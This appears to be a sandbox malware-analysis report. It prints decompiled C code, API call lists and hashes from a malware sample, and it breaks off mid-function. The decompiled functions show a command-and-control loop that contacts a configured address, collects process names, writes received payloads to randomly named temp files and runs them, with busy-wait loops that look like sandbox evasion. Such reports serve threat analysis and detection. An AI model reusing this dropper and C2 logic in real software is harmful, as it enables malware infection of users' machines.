0x0005972b
0x00059737
0x00059940
0x00059949
0x00059956
0x00059980
0x00059985
0x0005998e
0x0005998e
0x00000000
0x0005973d
0x00059749
0x0005974b
0x00059750
0x00059996
0x0005999f
0x00059756
0x0005977e
0x00059780
0x00059785
0x0005979c
0x0005979e
0x000597a3
0x000597aa
0x000597ae
0x000597af
0x000597b1
0x000597b3
0x000597b5
0x000597b7
0x000597b9
0x000597c2
0x000597eb
0x000597ed
0x000597f2
0x000597f8
0x000597fa
0x000597ff
0x00059803
0x00059804
0x00059807
0x00059808
0x0005980a
0x0005980c
0x0005980e
0x00059817
0x00059930
0x0005981d
0x0005981d
0x0005982e
0x00059832
0x00059835
0x0005983a
0x00059840
0x00059853
0x00059857
0x0005985c
0x0005985d
0x0005985f
0x00059861
0x00059863
0x0005986c
0x0005988b
0x0005988f
0x0005989c
0x000598a2
0x000598a7
0x000598b2
0x000598b2
0x000598a7
0x0005988f
0x000598b9
0x000598b9
0x000598bf
0x000598c2
0x000598c9
0x000598cc
0x00000000
0x00000000
0x00000000
0x000598cc
0x000598d2
0x000598d2
0x000598e1
0x000598eb
0x000598f1
0x00059901
0x00059901
0x000598eb
0x000597f2
0x00059787
0x00059795
0x00059795
0x00059909
0x00059910
0x00059917
0x00059917
0x0005991e
0x0005992f
0x0005992f
0x00059750
0x00059737
0x00059646
0x00059646
0x00059646

APIs

lstrcmpiW.KERNEL32(0005C9C8,0005C7C0), ref: 00059636
memset.NTDLL ref: 0005965A
memset.NTDLL ref: 0005966B
GetTempPathW.KERNEL32(00000104,?), ref: 000596B5
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 000596C7

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Tempmemset$FileNamePathlstrcmpi
String ID:
API String ID: 2872760765-0
Opcode ID: 4a13821b2ba1853bdbfaf5a8b2009491aab4adf84d7d01f23e4becd7e6816914
Instruction ID: 50fdae2618a9860456d916f44780030f70d9c6e66c373a3fee28ba4968c8cea7
Opcode Fuzzy Hash: 4a13821b2ba1853bdbfaf5a8b2009491aab4adf84d7d01f23e4becd7e6816914
Instruction Fuzzy Hash: 54A12C71A40309EFFB219BA4DC89FAF7BB8AB09B06F140019FA05E61D0DB795948CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00059A90, Relevance: 25.6, APIs: 17, Instructions: 139
memoryfilesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00059A90(void* __ecx, long __edx) {
				long _v8;
				void* _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOW _v100;
				char _v228;
				short _v748;
				signed int _t28;
				int _t46;
				void* _t52;
				void* _t59;
				void* _t60;
				short _t61;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_v8 = __edx;
				_t52 = __ecx;
				memset( &_v100, 0, 0x44);
				memset( &_v28, 0, 0x10);
				_v100.cb = 0x44;
				_v100.dwFlags = 0x80;
				_t61 = 0;
				do {
					if(_t61 < 0xfa00) {
						GetLastError();
					}
					_t61 = _t61 + 1;
				} while (_t61 < 0x8000000);
				_t28 = GetTickCount();
				_t7 = (_t28 & 0x0000000f) + 4; // 0x4
				E00052240( &_v228, _t7);
				 *((short*)(_t68 + (_t28 & 0x0000000f) * 2 - 0xd8)) = 0;
				E00051830(0x51370, 0xc, 0x7d1cc189,  &_v12);
				_t64 = _v12;
				 *0x5c200( &_v748, 0x104, _t64, 0x5c5b8,  &_v228);
				HeapFree(GetProcessHeap(), 0, _t64);
				_t65 = 0;
				do {
					if(_t65 < 0xfa00) {
						GetLastError();
					}
					_t65 = _t65 + 1;
				} while (_t65 < 0x8000000);
				_t59 = CreateFileW( &_v748, 0x40000000, 0, 0, 2, 0x80, 0);
				_t66 = 0;
				do {
					if(_t66 < 0xfa00) {
						GetLastError();
					}
					_t66 = _t66 + 1;
				} while (_t66 < 0x8000000);
				if(_t59 != 0xffffffff) {
					WriteFile(_t59, _t52, _v8,  &_v8, 0);
					CloseHandle(_t59);
				}
				_t60 = 0;
				do {
					_t67 = 0;
					do {
						if(_t67 < 0xfa00) {
							GetLastError();
						}
						_t67 = _t67 + 1;
					} while (_t67 < 0x8000000);
					_t46 = CreateProcessW( &_v748, 0, 0, 0, 0, 0, 0, 0,  &_v100,  &_v28);
					if(_t46 != 0) {
						CloseHandle(_v28);
						return CloseHandle(_v28.hThread);
					} else {
						goto L20;
					}
					L23:
					L20:
					_t60 = _t60 + 1;
					Sleep(0xc8);
				} while (_t60 < 0x10);
				return _t46;
				goto L23;
			}

0x00059aa1
0x00059aa7
0x00059aa9
0x00059ab7
0x00059ac0
0x00059ac7
0x00059ace
0x00059ad0
0x00059ad6
0x00059ad8
0x00059ad8
0x00059ade
0x00059adf
0x00059ae7
0x00059af8
0x00059afb
0x00059b07
0x00059b1d
0x00059b22
0x00059b3e
0x00059b51
0x00059b57
0x00059b60
0x00059b66
0x00059b68
0x00059b68
0x00059b6e
0x00059b6f
0x00059b96
0x00059b98
0x00059ba0
0x00059ba6
0x00059ba8
0x00059ba8
0x00059bae
0x00059baf
0x00059bba
0x00059bc7
0x00059bce
0x00059bce
0x00059bd4
0x00059bd6
0x00059bd6
0x00059bd8
0x00059bde
0x00059be0
0x00059be0
0x00059be6
0x00059be7
0x00059c0c
0x00059c14
0x00059c31
0x00059c46
0x00000000
0x00000000
0x00000000
0x00000000
0x00059c16
0x00059c1b
0x00059c1c
0x00059c22
0x00059c2d
0x00000000

APIs

memset.NTDLL ref: 00059AA9
memset.NTDLL ref: 00059AB7
GetLastError.KERNEL32 ref: 00059AD8
GetTickCount.KERNEL32 ref: 00059AE7
_snwprintf.NTDLL ref: 00059B3E
GetProcessHeap.KERNEL32(00000000,?), ref: 00059B4A
HeapFree.KERNEL32(00000000), ref: 00059B51
GetLastError.KERNEL32 ref: 00059B68
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00059B90
GetLastError.KERNEL32 ref: 00059BA8
WriteFile.KERNEL32(00000000,?,00058F6C,00058F6C,00000000), ref: 00059BC7
CloseHandle.KERNEL32(00000000), ref: 00059BCE
GetLastError.KERNEL32 ref: 00059BE0
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00059C0C
Sleep.KERNEL32(000000C8), ref: 00059C1C

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: ErrorLast$CreateFileHeapProcessmemset$CloseCountFreeHandleSleepTickWrite_snwprintf
String ID:
API String ID: 2430354324-0
Opcode ID: 86eaa78607840c3872e08224bdb0a43d1af0efd71056a53661e7bd2bddafeaf1
Instruction ID: b21f3f28c8a97f3d1b1e0aa8ead6fe83932ddc3577fac0975c94faf1ccff73c5
Opcode Fuzzy Hash: 86eaa78607840c3872e08224bdb0a43d1af0efd71056a53661e7bd2bddafeaf1
Instruction Fuzzy Hash: 07418372940718AFFB109BA4EC4DFEFB769EB45302F010161EE4AE7091DB345985CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00058520, Relevance: 22.7, APIs: 15, Instructions: 152
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E00058520(void* _a4, long* _a8) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				void* _v20;
				char _v24;
				void* _v28;
				char _v32;
				void* _v40;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v188;
				void* _t42;
				signed char* _t62;
				void* _t64;
				void _t79;
				long _t82;
				long* _t83;
				signed char* _t88;
				void* _t92;
				long* _t103;
				void* _t104;
				void* _t105;

				_v32 = 0x10;
				_t42 = E00058420( *_a4,  *((intOrPtr*)(_a4 + 4)),  &_v24);
				_t103 = _a8;
				_v28 = _t42;
				_t83 =  &(_t103[1]);
				 *_t83 = 0;
				 *_t103 = 0;
				if(_t42 != 0) {
					if(E00058700( &_v40,  &_v32) != 0) {
						if(E000523F0( &_v40,  &_v12) != 0) {
							E00051830(0x5c020, 0xc, 0x58619fa4,  &_a4);
							_t88 =  *0x5c298; // 0x0
							_t104 = _a4;
							 *0x5c200( &_v188, 0x40, _t104, _t88[3] & 0x000000ff, _t88[2] & 0x000000ff, _t88[1] & 0x000000ff,  *_t88 & 0x000000ff);
							HeapFree(GetProcessHeap(), 0, _t104);
							_t62 =  *0x5c298; // 0x0
							_push(_t88);
							_t64 = E00051C50( &_v60,  &_v188, _t62[4] & 0x0000ffff);
							_t105 = _v12;
							if(_t64 != 0) {
								_push(_v8);
								_push(_t105);
								if(E00051D40( &_v60) != 0) {
									if(E00051E50( &_v60,  &_v12,  &_v8) != 0) {
										if(E00052530( &_v12,  &_v20) != 0) {
											_t92 = _v20;
											_t79 =  *_t92;
											 *_t83 = _t79;
											if(_t79 < 0x4000000) {
												_t82 = E000584C0(_t92 + 4, _v16 - 4, _t83);
												_t92 = _v20;
												 *_t103 = _t82;
											}
											HeapFree(GetProcessHeap(), 0, _t92);
										}
										HeapFree(GetProcessHeap(), 0, _v12);
									}
									 *0x5c234(_v52);
								}
								 *0x5c234(_v56);
								 *0x5c234(_v60);
							}
							HeapFree(GetProcessHeap(), 0, 0);
							HeapFree(GetProcessHeap(), 0, _t105);
						}
						HeapFree(GetProcessHeap(), 0, _v40);
					}
					HeapFree(GetProcessHeap(), 0, _v28);
				}
				return 0 |  *_t103 != 0x00000000;
			}

0x00058538
0x0005853f
0x00058544
0x0005854a
0x0005854d
0x00058550
0x00058556
0x0005855e
0x00058571
0x00058588
0x000585a1
0x000585a6
0x000585ac
0x000585cc
0x000585df
0x000585e5
0x000585f0
0x000585f9
0x000585fe
0x00058606
0x0005860c
0x00058612
0x00058620
0x00058636
0x00058649
0x0005864b
0x0005864e
0x00058650
0x00058657
0x00058663
0x00058668
0x0005866e
0x0005866e
0x0005867a
0x0005867a
0x0005868c
0x0005868c
0x00058695
0x00058695
0x0005869e
0x000586a7
0x000586a7
0x000586b8
0x000586c8
0x000586c8
0x000586da
0x000586da
0x000586ec
0x000586ec
0x000586ff

APIs

Part of subcall function 00058420: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,000DBBA0), ref: 00058468
Part of subcall function 00058420: RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 0005846F
Part of subcall function 00058420: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,000DBBA0), ref: 00058493
Part of subcall function 00058420: HeapFree.KERNEL32(00000000,?,000DBBA0,?,000DBBA0), ref: 0005849A

Part of subcall function 00058700: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,0005856F), ref: 00058746
Part of subcall function 00058700: RtlAllocateHeap.NTDLL(00000000), ref: 0005874D
Part of subcall function 00058700: memcpy.NTDLL(00000000,?,?), ref: 000587A9

_snwprintf.NTDLL ref: 000585CC
GetProcessHeap.KERNEL32(00000000,?), ref: 000585D8
HeapFree.KERNEL32(00000000), ref: 000585DF

Part of subcall function 00051C50: memset.NTDLL ref: 00051C70
Part of subcall function 00051C50: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00051C9C
Part of subcall function 00051C50: GetProcessHeap.KERNEL32(00000008,00000000), ref: 00051CAE
Part of subcall function 00051C50: RtlAllocateHeap.NTDLL(00000000), ref: 00051CB5
Part of subcall function 00051C50: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00051CD0
Part of subcall function 00051C50: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00051CED
Part of subcall function 00051C50: HeapFree.KERNEL32(00000000), ref: 00051CF4

GetProcessHeap.KERNEL32(00000000,?), ref: 00058673
HeapFree.KERNEL32(00000000), ref: 0005867A

Part of subcall function 000584C0: GetProcessHeap.KERNEL32(00000000,00058668,?,?,?,00058668,?), ref: 000584D5
Part of subcall function 000584C0: RtlAllocateHeap.NTDLL(00000000), ref: 000584DC
Part of subcall function 000584C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000584FF
Part of subcall function 000584C0: HeapFree.KERNEL32(00000000), ref: 00058506

GetProcessHeap.KERNEL32(00000000,?), ref: 00058685
HeapFree.KERNEL32(00000000), ref: 0005868C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000586B1
HeapFree.KERNEL32(00000000), ref: 000586B8
GetProcessHeap.KERNEL32(00000000,?), ref: 000586C1
HeapFree.KERNEL32(00000000), ref: 000586C8

Part of subcall function 00051D40: GetProcessHeap.KERNEL32(00000000,00000000,?,0005861B), ref: 00051DA2
Part of subcall function 00051D40: HeapFree.KERNEL32(00000000,?,0005861B), ref: 00051DA9

Part of subcall function 00051E50: GetProcessHeap.KERNEL32(00000000,?,?,?,?,00058631), ref: 00051E89
Part of subcall function 00051E50: RtlAllocateHeap.NTDLL(00000000), ref: 00051E90
Part of subcall function 00051E50: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00051EFB
Part of subcall function 00051E50: HeapFree.KERNEL32(00000000), ref: 00051F02

GetProcessHeap.KERNEL32(00000000,?), ref: 000586D3
HeapFree.KERNEL32(00000000), ref: 000586DA

Part of subcall function 00051830: GetProcessHeap.KERNEL32(00000008,00059F6B,00000000,00000000,00051004,?,000515F4,4DBAC13F,00059F6B,?,00000000), ref: 00051844
Part of subcall function 00051830: RtlAllocateHeap.NTDLL(00000000,?,000515F4), ref: 0005184B

GetProcessHeap.KERNEL32(00000000,?), ref: 000586E5
HeapFree.KERNEL32(00000000), ref: 000586EC

Part of subcall function 000523F0: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?), ref: 00052422
Part of subcall function 000523F0: RtlAllocateHeap.NTDLL(00000000), ref: 00052429
Part of subcall function 000523F0: memcpy.NTDLL(00058583,?,?), ref: 00052467
Part of subcall function 000523F0: GetProcessHeap.KERNEL32(00000000,00058583), ref: 0005250A
Part of subcall function 000523F0: HeapFree.KERNEL32(00000000), ref: 00052511

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocate$ByteCharMultiWidememcpy$_snwprintfmemset
String ID:
API String ID: 876682111-0
Opcode ID: c9750af93416752ccf6a71830dcc542b19adbe3b0ce21a588f2a899623452843
Instruction ID: 57871cb32859534dd222e0c7b634d640d1f8aca429166b0b20e51569c2b7ddc4
Opcode Fuzzy Hash: c9750af93416752ccf6a71830dcc542b19adbe3b0ce21a588f2a899623452843
Instruction Fuzzy Hash: E4510C71900305AFFB409BA4DC49FEF7BB9AF09306F044450FA05E6162EB359A59CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00058DD0, Relevance: 21.2, APIs: 14, Instructions: 155
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00058DD0(void* __edx) {
				void* _v16;
				void* _v24;
				char _v28;
				void* _v32;
				char _v36;
				intOrPtr _v44;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				long _v72;
				void* _v76;
				void* _v84;
				void* _v92;
				signed int _t28;
				long _t29;

				_t28 = GetTickCount();
				if(_t28 <  *0x5c278) {
					L24:
					return _t28;
				} else {
					_t29 =  *0x5c280; // 0x0
					_t28 = _t29 - 1;
					if(_t28 > 3) {
						goto L24;
					} else {
						switch( *((intOrPtr*)(_t28 * 4 +  &M00059044))) {
							case 0:
								 *0x5c280 = 2;
								return _t28;
								goto L25;
							case 1:
								 *0x5c280 = 0;
								__eax = E00059620(__ecx, __edx);
								__eax = __eax;
								if(__eax == 0) {
									 *0x5c280 = 3;
									_pop(__esi);
									return __eax;
								} else {
									if(__eax != 0) {
										goto L24;
									} else {
										__eax = SetEvent( *0x5c29c);
										_pop(__esi);
										return __eax;
									}
								}
								goto L25;
							case 2:
								 *0x5c280 = 0;
								 *0x5c294 = 0x51270;
								 *0x5c298 = 0x51270;
								__eax = E000522E0();
								__eax =  *0x5c02c; // 0x512f8
								 *0x5c26c = __eax;
								__eax =  *0x5c030; // 0x6a
								 *0x5c268 = 0x5c2a8;
								 *0x5c270 = __eax;
								 *0x5c280 = 4;
								_pop(__esi);
								return __eax;
								goto L25;
							case 3:
								__ecx =  &_v28;
								 *0x5c280 = 0;
								__eax = E00058BB0( &_v28);
								__ecx =  &_v36;
								__eax = E00058D50( &_v36);
								__eax =  *0x5cbd0; // 0x0
								_push(0x5c2a8);
								_v32 = __eax;
								_v44 = 0x5c2a8;
								_v44 =  *0x5c1e4();
								__eax =  *0x5c2a4; // 0x0
								_v52 = __eax;
								do {
									__ecx =  &_v24;
									__esi = 0xdbba0;
									__eax = E00058920( &_v24);
									__ecx =  &_v16;
									__eax = E0005A7A0( &_v16);
									__edx =  &_v52;
									__ecx =  &_v84;
									if(E00059F80( &_v84,  &_v52) != 0) {
										 &_v92 =  &_v84;
										if(E00058520( &_v84,  &_v92) == 0) {
											__eax =  *0x5c298; // 0x0
											__esi = 0x7530;
											__eax = __eax + 8;
											 *0x5c298 = __eax;
											 *0x5c298 = __eax;
										} else {
											__eax = E000599A0();
											__ecx = 0;
											__eax = E000588B0(0);
											__ecx = 0;
											__eax = E0005A750(0);
											__edx =  &_v76;
											__ecx =  &_v92;
											if(E0005A180( &_v92,  &_v76) != 0) {
												__eax = E00051750();
												__edx = _v72;
												if(__edx != 0) {
													__ecx = _v76;
													__eax = E00059A90(_v76, __edx);
												}
												__eax = E00051750();
												__edx = _v64;
												if(__edx != 0) {
													__ecx = _v68;
													__eax = E00058990(_v68, __edx);
													__esi = 0;
												}
												__eax = E00051750();
												__edx = _v56;
												if(__edx != 0) {
													__ecx = _v60;
													__eax = E0005A810(_v60, __edx);
													__esi = 0;
												}
											}
											GetProcessHeap() = HeapFree(__eax, 0, _v92);
										}
										GetProcessHeap() = HeapFree(__eax, 0, _v84);
									}
									GetProcessHeap() = HeapFree(__eax, 0, _v24);
									GetProcessHeap() = HeapFree(__eax, 0, _v16);
								} while (__esi == 0);
								__eax = GetTickCount();
								__eax = __eax + __esi;
								 *0x5c280 = 4;
								 *0x5c278 = __eax;
								GetProcessHeap() = HeapFree(__eax, 0, _v32);
								goto L24;
						}
					}
				}
				L25:
			}

0x00058dda
0x00058de6
0x0005903d
0x00059041
0x00058dec
0x00058dec
0x00058df1
0x00058df5
0x00000000
0x00058dfb
0x00058dfb
0x00000000
0x00058e02
0x00058e10
0x00000000
0x00000000
0x00058e13
0x00058e1d
0x00058e22
0x00058e25
0x00058e41
0x00058e4b
0x00058e4f
0x00058e27
0x00058e28
0x00000000
0x00058e2e
0x00058e34
0x00058e3a
0x00058e3e
0x00058e3e
0x00058e28
0x00000000
0x00000000
0x00058e52
0x00058e5c
0x00058e66
0x00058e70
0x00058e75
0x00058e7a
0x00058e7f
0x00058e84
0x00058e8e
0x00058e93
0x00058e9d
0x00058ea1
0x00000000
0x00000000
0x00058ea4
0x00058ea8
0x00058eb2
0x00058eb7
0x00058ebb
0x00058ec0
0x00058ec5
0x00058eca
0x00058ece
0x00058edc
0x00058ee0
0x00058ee8
0x00058ef0
0x00058ef0
0x00058ef4
0x00058ef9
0x00058efe
0x00058f02
0x00058f07
0x00058f0b
0x00058f16
0x00058f21
0x00058f30
0x00058fb1
0x00058fb6
0x00058fbb
0x00058fbe
0x00058fcd
0x00058f32
0x00058f32
0x00058f37
0x00058f39
0x00058f3e
0x00058f40
0x00058f45
0x00058f49
0x00058f54
0x00058f56
0x00058f5b
0x00058f61
0x00058f63
0x00058f67
0x00058f67
0x00058f6c
0x00058f71
0x00058f77
0x00058f79
0x00058f7d
0x00058f82
0x00058f82
0x00058f84
0x00058f89
0x00058f8f
0x00058f91
0x00058f95
0x00058f9a
0x00058f9a
0x00058f8f
0x00058fa9
0x00058fa9
0x00058fdf
0x00058fdf
0x00058ff2
0x00059005
0x0005900b
0x00059013
0x0005901d
0x0005901f
0x0005902b
0x00059037
0x00000000
0x00000000
0x00058dfb
0x00058df5
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00058DDA
SetEvent.KERNEL32 ref: 00058E34
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0005C2A8), ref: 00058ED6
GetProcessHeap.KERNEL32(00000000,?), ref: 00058FA2
HeapFree.KERNEL32(00000000), ref: 00058FA9
GetProcessHeap.KERNEL32(00000000,?), ref: 00058FD8
HeapFree.KERNEL32(00000000), ref: 00058FDF
GetProcessHeap.KERNEL32(00000000,?), ref: 00058FEB
HeapFree.KERNEL32(00000000), ref: 00058FF2
GetProcessHeap.KERNEL32(00000000,?), ref: 00058FFE
HeapFree.KERNEL32(00000000), ref: 00059005
GetTickCount.KERNEL32 ref: 00059013
GetProcessHeap.KERNEL32(00000000,?), ref: 00059030
HeapFree.KERNEL32(00000000), ref: 00059037

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$CountTick$Eventlstrlen
String ID:
API String ID: 1747682351-0
Opcode ID: 0bc1ec327e8b62e4fb59e286e1c2e2744f60545f667177eea29f078a781d6a6f
Instruction ID: fd615e7742140b2aee97e75cbe702333045ad591513f01e1ba6c46e42252f3b4
Opcode Fuzzy Hash: 0bc1ec327e8b62e4fb59e286e1c2e2744f60545f667177eea29f078a781d6a6f
Instruction Fuzzy Hash: B2516A725043009FF740EFA4EC4AE9B7BA5FB49307F044A19FD45922A2DF799948CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00058BB0, Relevance: 21.2, APIs: 14, Instructions: 154
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00058BB0(char** __ecx) {
				short* _v8;
				long _v12;
				char** _v16;
				int* _v20;
				short _v540;
				char** _t39;
				short* _t49;
				int* _t61;
				int _t71;
				int _t73;
				signed int _t74;
				short* _t75;
				intOrPtr* _t80;
				long _t82;
				int _t83;
				char** _t84;
				WCHAR* _t86;
				char* _t87;

				_v12 = 0;
				_t73 = 0;
				_v16 = __ecx;
				 *__ecx = 0;
				_t39 =  &(__ecx[1]);
				_v20 = _t39;
				_v8 = 0;
				 *_t39 = 0;
				GetModuleFileNameW(0,  &_v540, 0x104);
				_t86 =  &(( &_v540)[lstrlenW( &_v540)]);
				if(_t86 >  &_v540) {
					while( *_t86 != 0x5c) {
						_t86 = _t86 - 2;
						if(_t86 >  &_v540) {
							continue;
						} else {
						}
						goto L6;
					}
					_t86 =  &(_t86[1]);
				}
				L6:
				E00052110( &_v12);
				_t80 = _v12;
				if(_t80 != 0) {
					_t75 = 0;
					do {
						_t14 = _t80 + 4; // 0x4
						_t71 = lstrlenW(_t14);
						_t80 =  *_t80;
						_t75 = _t75 + 1 + _t71;
					} while (_t80 != 0);
					_v8 = _t75;
					_t73 = 0;
				}
				_t49 = RtlAllocateHeap(GetProcessHeap(), 8, _v8 + _v8);
				_v8 = _t49;
				if(_t49 == 0) {
					return 0 |  *_v16 != 0x00000000;
				} else {
					_t82 = _v12;
					while(_t82 != 0) {
						_t19 = _t82 + 4; // 0x4
						if(lstrcmpiW(_t19, _t86) == 0) {
							_t49 = _v8;
						} else {
							_t20 = _t82 + 4; // 0x4
							lstrcpyW( &(_v8[_t73]), _t20);
							_t24 = _t82 + 4; // 0x4
							_t74 = _t73 + lstrlenW(_t24);
							_t49 = _v8;
							_t49[_t74] = 0x2c;
							_t73 = _t74 + 1;
						}
						_t82 =  *_t82;
					}
					_t87 = 0;
					_t83 = WideCharToMultiByte(0xfde9, 0, _t49, _t73, 0, 0, 0, 0);
					if(_t83 != 0) {
						_t87 = RtlAllocateHeap(GetProcessHeap(), 8, _t83);
						if(_t87 != 0) {
							WideCharToMultiByte(0xfde9, 0, _v8, _t73, _t87, _t83, 0, 0);
							_t61 = _v20;
							if(_t61 != 0) {
								 *_t61 = _t83;
							}
						}
					}
					_t84 = _v16;
					 *_t84 = _t87;
					HeapFree(GetProcessHeap(), 0, _v8);
					return 0 |  *_t84 != 0x00000000;
				}
			}

0x00058bbc
0x00058bc3
0x00058bc5
0x00058bca
0x00058bcc
0x00058bcf
0x00058bd7
0x00058bde
0x00058be8
0x00058c01
0x00058c0c
0x00058c10
0x00058c16
0x00058c21
0x00000000
0x00000000
0x00058c23
0x00000000
0x00058c21
0x00058c25
0x00058c25
0x00058c28
0x00058c2b
0x00058c30
0x00058c35
0x00058c37
0x00058c40
0x00058c40
0x00058c44
0x00058c4a
0x00058c4d
0x00058c4f
0x00058c53
0x00058c56
0x00058c56
0x00058c67
0x00058c6d
0x00058c72
0x00058d4a
0x00058c78
0x00058c78
0x00058c7d
0x00058c80
0x00058c8d
0x00058cbb
0x00058c8f
0x00058c8f
0x00058c9a
0x00058ca0
0x00058caa
0x00058cb1
0x00058cb4
0x00058cb8
0x00058cb8
0x00058cbe
0x00058cc0
0x00058cc4
0x00058cd8
0x00058cdc
0x00058cee
0x00058cf2
0x00058d06
0x00058d0c
0x00058d11
0x00058d13
0x00058d13
0x00058d11
0x00058cf2
0x00058d15
0x00058d1d
0x00058d26
0x00058d39
0x00058d39

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00058BE8
lstrlenW.KERNEL32(?), ref: 00058BF5
lstrlenW.KERNEL32(00000004), ref: 00058C44
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00058C60
RtlAllocateHeap.NTDLL(00000000), ref: 00058C67
lstrcmpiW.KERNEL32(00000004,?), ref: 00058C85
lstrcpyW.KERNEL32(00000000,00000004), ref: 00058C9A
lstrlenW.KERNEL32(00000004), ref: 00058CA4
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00058CD2
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00058CE1
RtlAllocateHeap.NTDLL(00000000), ref: 00058CE8
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00058D06
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00058D1F
HeapFree.KERNEL32(00000000), ref: 00058D26

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Heap$Processlstrlen$AllocateByteCharMultiWide$FileFreeModuleNamelstrcmpilstrcpy
String ID:
API String ID: 2501218360-0
Opcode ID: 139f629e2bb20f331e52654e7b5372ef4fe290dcc910c231dfa721fc23f2930c
Instruction ID: 275a26f87e6289d4f2b83634471622df9a49a3f81260cd03f72343651fbc5c8c
Opcode Fuzzy Hash: 139f629e2bb20f331e52654e7b5372ef4fe290dcc910c231dfa721fc23f2930c
Instruction Fuzzy Hash: 9F518072901719AFEB209FA4CC88E9BBBB8EF45312F154465ED09E7250DB349D45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0005A690, Relevance: 15.1, APIs: 10, Instructions: 65
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0005A690(void* __ecx) {
				void* _t15;
				void* _t22;
				void _t25;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t33;

				_t31 = __ecx;
				_t15 = RtlAllocateHeap(GetProcessHeap(), 8,  *((intOrPtr*)(__ecx + 0xc)) + 0x10);
				_t33 = _t15;
				if(_t33 == 0) {
					return _t15;
				} else {
					 *_t33 =  *_t31;
